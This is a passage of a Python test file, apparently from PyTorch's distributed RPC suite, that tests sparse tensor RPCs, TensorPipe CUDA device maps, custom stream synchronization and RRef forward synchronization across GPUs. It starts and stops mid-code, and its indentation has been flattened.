build_sparse_tensor() * 6
)
@dist_init
def test_py_rpc_rref_args_sparse(self):
self._py_rpc_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
@dist_init
def test_nested_remote_sparse(self):
self._nested_remote(
nested_remote_sparse,
build_sparse_tensor() + build_sparse_tensor()
)
@dist_init
def test_nested_rref_sparse(self):
self._nested_rref(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_nested_rref_stress_sparse(self):
self._nested_rref_stress(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_my_parameter_server_sparse(self):
self._my_parameter_server(True)
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture, RpcTestCommon):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
# worker1 hosts the model and runs forward. The forward functions
# calls RRef.to_here(), hence needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
# worker2 will get the out RRef and call to_here() and hence, needs
# to configure devcie map.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
@skip_if_lt_x_gpu(1)
